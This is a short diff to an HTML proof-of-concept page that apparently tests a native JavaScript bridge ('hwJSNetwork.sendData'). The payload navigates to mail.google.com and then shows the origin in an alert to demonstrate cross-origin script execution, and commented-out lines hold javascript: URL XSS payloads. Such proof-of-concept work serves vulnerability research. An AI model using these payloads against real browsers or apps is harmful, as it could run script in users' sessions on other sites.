--- a/window-open-iframe-js.html
+++ b/window-open-iframe-js.html
@@ -1,7 +1,7 @@
 <body>
 <script>
-  hwJSNetwork.sendData("https://", "GET", "", "", "window.alert('sendData:'+window.location.origin); dummy"); 
-  window.location="https://mail.google.com";
+  hwJSNetwork.sendData("https://", "GET", "", "", "window.location='https://mail.google.com'; window.alert('sendData:'+window.location.origin); setTimeout(alert(2), 1000); dummy"); 
+//  window.location="https://mail.google.com";
 //  window.open('javascript:var elem = document.createElement("p");elem.innerHTML = "<b>Executed JS in parent origin: "+window.location.origin+"</b>"; document.body.append(elem);alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
 //  window.open("javascript:alert('Executed JS in target '+window.location.origin)");
 //  window.open("https://example.com");
